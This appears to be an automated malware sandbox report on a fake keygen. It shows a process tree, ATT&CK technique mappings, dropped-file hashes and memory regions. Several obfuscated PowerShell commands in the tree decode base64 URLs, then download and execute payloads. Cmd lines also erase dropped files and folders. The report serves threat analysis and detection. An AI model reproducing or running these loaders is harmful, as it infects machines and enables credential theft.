                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1908
                  • C:\Users\Public\ovs.exe
                    "C:\Users\Public\ovs.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2396
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                      6⤵
                      • Loads dropped DLL
                      PID:584
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2040
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                          8⤵
                          • Loads dropped DLL
                          PID:2248
                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                            9⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1916
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                              "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                              10⤵
                              • Executes dropped EXE
                              PID:1512
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          8⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:2616
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 2616 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\822806194437542\\* & exit
                            9⤵
                              PID:2056
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /pid 2616
                                10⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1224
                      • C:\Users\Public\ovs.exe
                        "C:\Users\Public\ovs.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:1940
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\958B.tmp\b1.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:1868
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1976
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 2
                  3⤵
                  • Delays execution with timeout.exe
                  PID:1936
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\958B.tmp\ba.hta"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:684
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:620
                    • C:\Users\Public\tkc.exe
                      "C:\Users\Public\tkc.exe"
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2440
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:2640
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                          7⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:2912
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 2912 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\367807913375732\\* & exit
                            8⤵
                              PID:2592
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /pid 2912
                                9⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2404
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:2672
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:2392
                        • C:\Users\Public\tkc.exe
                          "C:\Users\Public\tkc.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:2776
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\958B.tmp\ba1.hta"
                    3⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:1284
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1476

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              Modify Existing Service

              1
              T1031

              Defense Evasion

              Modify Registry

              4
              T1112

              Disabling Security Tools

              2
              T1089

              Install Root Certificate

              1
              T1130

              Credential Access

              Credentials in Files

              3
              T1081

              Discovery

              Query Registry

              2
              T1012

              System Information Discovery

              2
              T1082

              Collection

              Data from Local System

              3
              T1005

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\ProgramData\MSVCP140.dll
              • C:\ProgramData\VCRUNTIME140.dll
              • C:\ProgramData\freebl3.dll
              • C:\ProgramData\mozglue.dll
              • C:\ProgramData\mozglue.dll
              • C:\ProgramData\msvcp140.dll
              • C:\ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • C:\ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • C:\ProgramData\softokn3.dll
              • C:\ProgramData\softokn3.dll
              • C:\ProgramData\sqlite3.dll
              • C:\ProgramData\sqlite3.dll
              • C:\ProgramData\vcruntime140.dll
              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_50cdb765-c903-46f8-986a-5560fd9ddaae
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6479b661-27d2-488c-9199-3272e0bae423
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8d82536a-8293-4ea7-a51e-13d65f928a14
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_91bfee3a-dc92-44d3-a252-5e9f158dd69e
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Temp\7SWdhai2w2.exe
              • C:\Users\Admin\AppData\Local\Temp\7SWdhai2w2.exe
              • C:\Users\Admin\AppData\Local\Temp\958B.tmp\Keygen.exe
              • C:\Users\Admin\AppData\Local\Temp\958B.tmp\Keygen.exe
              • C:\Users\Admin\AppData\Local\Temp\958B.tmp\b.hta
              • C:\Users\Admin\AppData\Local\Temp\958B.tmp\b1.hta
              • C:\Users\Admin\AppData\Local\Temp\958B.tmp\ba.hta
              • C:\Users\Admin\AppData\Local\Temp\958B.tmp\ba1.hta
              • C:\Users\Admin\AppData\Local\Temp\958B.tmp\m.hta
              • C:\Users\Admin\AppData\Local\Temp\958B.tmp\m1.hta
              • C:\Users\Admin\AppData\Local\Temp\958B.tmp\start.bat
              • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\cTJAJxTpDJ.exe
                MD5

                013db621a3351e3fb049efd2ccad79ff

                SHA1

                a23394ea54dbc5342a77938a2c285ee616185560

                SHA256

                df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                SHA512

                1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\rVZz2m6ncK.exe
              • C:\Users\Admin\AppData\Local\Temp\rVZz2m6ncK.exe
              • C:\Users\Admin\AppData\Local\Temp\xS38vCwqXs.exe
              • C:\Users\Admin\AppData\Local\Temp\xS38vCwqXs.exe
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Public\ovs.exe
              • C:\Users\Public\ovs.exe
              • C:\Users\Public\ovs.exe
              • C:\Users\Public\tkc.exe
              • C:\Users\Public\tkc.exe
              • C:\Users\Public\tkc.exe
              • C:\Users\Public\wlu.exe
              • C:\Users\Public\wlu.exe
              • C:\Users\Public\wlu.exe
              • \??\PIPE\lsarpc
              • \??\PIPE\srvsvc
              • \??\PIPE\srvsvc
              • \ProgramData\mozglue.dll
              • \ProgramData\mozglue.dll
              • \ProgramData\mozglue.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\sqlite3.dll
              • \ProgramData\sqlite3.dll
              • \ProgramData\sqlite3.dll
              • \ProgramData\vcruntime140.dll
              • \ProgramData\vcruntime140.dll
              • \ProgramData\vcruntime140.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                MD5

                02cc7b8ee30056d5912de54f1bdfc219

                SHA1

                a6923da95705fb81e368ae48f93d28522ef552fb

                SHA256

                1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                SHA512

                0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
              • \Users\Admin\AppData\LocalLow\sqlite3.dll
              • \Users\Admin\AppData\Local\Temp\7SWdhai2w2.exe
              • \Users\Admin\AppData\Local\Temp\958B.tmp\Keygen.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • \Users\Admin\AppData\Local\Temp\cTJAJxTpDJ.exe
                MD5

                013db621a3351e3fb049efd2ccad79ff

                SHA1

                a23394ea54dbc5342a77938a2c285ee616185560

                SHA256

                df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                SHA512

                1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\rVZz2m6ncK.exe
              • \Users\Admin\AppData\Local\Temp\xS38vCwqXs.exe
              • \Users\Public\ovs.exe
              • \Users\Public\tkc.exe
              • \Users\Public\tkc.exe
              • \Users\Public\wlu.exe
              • \Users\Public\wlu.exe
              • memory/568-323-0x0000000073680000-0x0000000073D6E000-memory.dmp
                Filesize

                6.9MB

              • memory/568-324-0x00000000013D0000-0x00000000013D1000-memory.dmp
                Filesize

                4KB

              • memory/568-320-0x0000000000000000-mapping.dmp
              • memory/568-357-0x0000000000370000-0x0000000000393000-memory.dmp
                Filesize

                140KB

              • memory/568-362-0x00000000006A0000-0x00000000006C4000-memory.dmp
                Filesize

                144KB

              • memory/584-248-0x0000000002860000-0x0000000002864000-memory.dmp
                Filesize

                16KB

              • memory/584-236-0x0000000000000000-mapping.dmp
              • memory/620-49-0x00000000028C0000-0x00000000028C1000-memory.dmp
                Filesize

                4KB

              • memory/620-32-0x0000000000000000-mapping.dmp
              • memory/620-42-0x00000000049C0000-0x00000000049C1000-memory.dmp
                Filesize

                4KB

              • memory/620-35-0x0000000070990000-0x000000007107E000-memory.dmp
                Filesize

                6.9MB

              • memory/684-28-0x0000000000000000-mapping.dmp
              • memory/924-191-0x0000000000400000-0x0000000000425000-memory.dmp
                Filesize

                148KB

              • memory/924-189-0x000000000041A684-mapping.dmp
              • memory/924-188-0x0000000000400000-0x0000000000425000-memory.dmp
                Filesize

                148KB

              • memory/1008-327-0x0000000000000000-mapping.dmp
              • memory/1008-378-0x0000000002F80000-0x0000000002FCC000-memory.dmp
                Filesize

                304KB

              • memory/1028-4-0x0000000000000000-mapping.dmp
              • memory/1028-5-0x0000000000000000-mapping.dmp
              • memory/1156-0-0x0000000000000000-mapping.dmp
              • memory/1224-303-0x0000000000000000-mapping.dmp
